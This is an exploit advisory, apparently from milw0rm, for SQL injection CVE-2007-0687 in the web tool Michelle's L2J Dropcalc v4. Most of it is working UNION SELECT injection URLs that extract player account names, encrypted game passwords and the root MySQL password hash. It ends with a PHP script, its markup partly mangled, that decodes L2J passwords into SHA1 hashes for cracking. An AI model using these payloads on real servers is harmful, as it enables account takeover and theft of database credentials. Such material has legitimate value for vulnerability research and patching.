Michelles L2J Dropcalc 4 - SQL Injection

Related Vulnerabilities: CVE-2007-0687  
Publish Date: 31 Jan 2007
Author: Codebreak

#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#  http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[SQL]
#  Example:
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#  Bonus:
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#   *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file

<--------- Beginning of PHP Script --------->

<style type="text/css">
.style3 {font-size: 24px}
.style1 {color: #CC0000}
echo("<title>L2J Pass Decoding - POC</title>");
$pass = $_POST['decode']; 
$unpass3 = base64_decode($pass);

$array = unpack("H*", $unpass3);
foreach ($array as $key => $value)
$unpass2 = $array[1];

echo("<span class=style1><b><u>Decoding Password</u></b></span>");

echo("<br><b>Base 64:</b> $pass<br>");
echo("<b>Unpacked:</b> $unpass3<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
<br><br><br><center><i>Created by Codebreak</center></i>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]